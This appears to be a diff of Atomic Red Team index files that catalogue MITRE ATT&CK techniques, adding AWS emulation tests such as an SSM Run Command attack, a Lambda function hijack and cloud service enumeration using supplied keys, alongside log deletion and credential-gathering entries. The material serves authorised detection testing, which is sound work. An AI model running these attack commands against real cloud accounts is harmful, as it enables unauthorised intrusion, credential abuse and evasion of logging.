 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/azure-ad-index.yaml

@@ -26137,7 +26137,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -26189,6 +26189,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -27527,6 +27528,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -27702,6 +27704,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -33890,7 +33893,7 @@ persistence:
           = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
           --display-name $username --password $password --user-principal-name $userprincipalname\naz
           ad user list --filter \"displayname eq 'atomicredteam'\"     "
-        cleanup_command: az ad user delete --id
+        cleanup_command: az ad user delete --id "#{userprincipalname}"
         name: powershell
   T1098:
     technique:
@@ -45669,7 +45672,7 @@ credential-access:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -51425,7 +51428,7 @@ discovery:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -58327,7 +58330,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -58345,6 +58348,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/containers-index.yaml

@@ -25813,7 +25813,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25865,6 +25865,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -27315,6 +27316,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -27490,6 +27492,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -57499,7 +57502,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -57517,6 +57520,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/google-workspace-index.yaml

@@ -25511,7 +25511,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25563,6 +25563,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -26901,6 +26902,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -27076,6 +27078,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -56874,7 +56877,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -56892,6 +56895,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -25395,7 +25395,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25447,6 +25447,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -26785,6 +26786,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -26960,6 +26962,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -56700,7 +56703,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -56718,6 +56721,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -11964,7 +11964,7 @@ defense-evasion:
           echo "*** Log Group Created ***"
           aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Deleted ***"
-        cleanup_command: 
+        cleanup_command:
         name: sh
         elevation_required: false
     - name: AWS CloudWatch Log Stream Deletes
@@ -12009,7 +12009,7 @@ defense-evasion:
           echo "*** Log Stream Deleted ***"
           aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Deleted ***"
-        cleanup_command: 
+        cleanup_command:
         name: sh
         elevation_required: false
   T1564.003:
@@ -21136,7 +21136,7 @@ privilege-escalation:
     - name: AWS - Create a group and add a user to that group
       auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
       description: 'Adversaries create AWS group, add users to specific to that group
-        to elevate their privilieges to gain more accesss
+        to elevate their privileges to gain more accesss
 
         '
       supported_platforms:
@@ -25832,7 +25832,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25884,6 +25884,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -27222,7 +27223,72 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1651
+    atomic_tests:
+    - name: AWS Run Command (and Control)
+      auto_generated_guid: a3cc9c95-c160-4b86-af6f-84fba87bfd30
+      description: 'This test simulates an adversary using the AWS Run Command service
+        to execute commands on EC2 instances.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        session_token:
+          description: AWS Session Token
+          type: string
+          default: ''
+        profile:
+          description: AWS profile
+          type: string
+          default: ''
+        region:
+          description: AWS region to deploy the EC2 instance
+          type: string
+          default: us-east-2
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The AWS PowerShell module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
+
+          '
+      - description: 'Terraform must be installed.
+
+          '
+        prereq_command: 'terraform --version
+
+          '
+        get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1651/src/T1651-1/AWSSSMAttack.ps1" -Force
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $region = "#{region}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
+          Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
+          Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
+          Invoke-SSMAttack -AWSProfile "T1651-1" -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1"
+          Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1651/src/T1651-1" -TerraformVariables @("profile=T1651-1", "region=$region")
+        name: powershell
   T1059.005:
     technique:
       modified: '2024-10-15T16:43:27.104Z'
@@ -27397,7 +27463,81 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-    atomic_tests: []
+      identifier: T1648
+    atomic_tests:
+    - name: Lambda Function Hijack
+      auto_generated_guid: 87a4a141-c2bb-49d1-a604-8679082d8b91
+      description: 'Modify an existing Lambda function to execute arbitrary code.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        session_token:
+          description: AWS Session Token
+          type: string
+          default: ''
+        profile:
+          description: AWS profile
+          type: string
+          default: ''
+        region:
+          description: AWS region to deploy the EC2 instance
+          type: string
+          default: us-east-2
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The AWS PowerShell module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
+
+          '
+      - description: 'Terraform must be installed.
+
+          '
+        prereq_command: 'terraform --version
+
+          '
+        get_prereq_command: 'Write-Host "Terraform is required. Download it from https://www.terraform.io/downloads.html"
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $region = "#{region}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
+          Invoke-Terraform -TerraformCommand init -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1"
+          Invoke-Terraform -TerraformCommand apply -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
+          Invoke-LambdaAttack -AWSProfile "T1648-1" -AWSRegion $region
+        cleanup_command: |
+          Import-Module "PathToAtomicsFolder/T1648/src/T1648-1/LambdaAttack.ps1" -Force
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $region = "#{region}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile -AWSRegion $region
+          Invoke-Terraform -TerraformCommand destroy -TerraformDirectory "PathToAtomicsFolder/T1648/src/T1648-1" -TerraformVariables @("profile=T1648-1", "region=$region")
+          Remove-MaliciousUser -AWSProfile "T1648-1"
+          Remove-TFFiles -Path "PathToAtomicsFolder/T1648/src/T1648-1/"
+        name: powershell
   T1204.001:
     technique:
       modified: '2024-09-10T16:40:03.786Z'
@@ -33394,7 +33534,7 @@ persistence:
     - name: AWS - Create a group and add a user to that group
       auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
       description: 'Adversaries create AWS group, add users to specific to that group
-        to elevate their privilieges to gain more accesss
+        to elevate their privileges to gain more accesss
 
         '
       supported_platforms:
@@ -52318,7 +52458,64 @@ discovery:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       identifier: T1526
-    atomic_tests: []
+    atomic_tests:
+    - name: AWS - Enumerate common cloud services
+      auto_generated_guid: aa8b9bcc-46fa-4a59-9237-73c7b93a980c
+      description: 'Upon successful execution, this test will enumerate common resources
+        that are contained within a valid AWS account.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        session_token:
+          description: AWS Session Token
+          type: string
+          default: ''
+        profile:
+          description: AWS profile
+          type: string
+          default: ''
+        regions:
+          description: AWS regions
+          type: string
+          default: us-east-1,us-east-2,us-west-1,us-west-2
+        output_directory:
+          description: Directory to output results to
+          type: string
+          default: "$env:TMPDIR/aws_discovery"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The AWS PowerShell module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AWSPowerShell -ErrorAction
+          SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AWSPowerShell -Force
+
+          '
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder\T1526\src\AWSDiscovery.ps1"
+          $access_key = "#{access_key}"
+          $secret_key = "#{secret_key}"
+          $session_token = "#{session_token}"
+          $aws_profile = "#{profile}"
+          $regions = "#{regions}"
+          Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile
+          Get-AWSDiscoveryData -Regions $regions -OutputDirectory "#{output_directory}"
+          Remove-BlankFiles -OutputDirectory "#{output_directory}"
+        name: powershell
   T1018:
     technique:
       modified: '2023-08-14T19:08:59.741Z'
@@ -57529,7 +57726,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -57547,6 +57744,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -11655,11 +11655,11 @@ defense-evasion:
         username:
           description: Azure username
           type: string
-          default: 
+          default:
         password:
           description: Azure password
           type: string
-          default: 
+          default:
         event_hub_name:
           description: Name of the eventhub
           type: string
@@ -11667,11 +11667,11 @@ defense-evasion:
         resource_group:
           description: Name of the resource group
           type: string
-          default: 
+          default:
         name_space_name:
           description: Name of the NameSpace
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'Install-Module -Name Az
@@ -25802,7 +25802,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25854,6 +25854,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -27192,6 +27193,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -27367,6 +27369,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -40955,11 +40958,11 @@ collection:
         container_name:
           description: Container name to search for (optional)
           type: string
-          default: 
+          default:
         blob_name:
           description: Blob name to search for (optional)
           type: string
-          default: 
+          default:
       executor:
         command: |
           try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
@@ -47519,7 +47522,7 @@ credential-access:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -47531,7 +47534,7 @@ credential-access:
         subscription_id:
           description: Azure subscription id to search
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -52336,7 +52339,7 @@ discovery:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -52348,7 +52351,7 @@ discovery:
         subscription_name:
           description: Azure subscription name to scan
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -52383,6 +52386,58 @@ discovery:
 
           '
         name: powershell
+    - name: Azure - Enumerate common cloud services
+      auto_generated_guid: 58f57c8f-db14-4e62-a4d3-5aaf556755d7
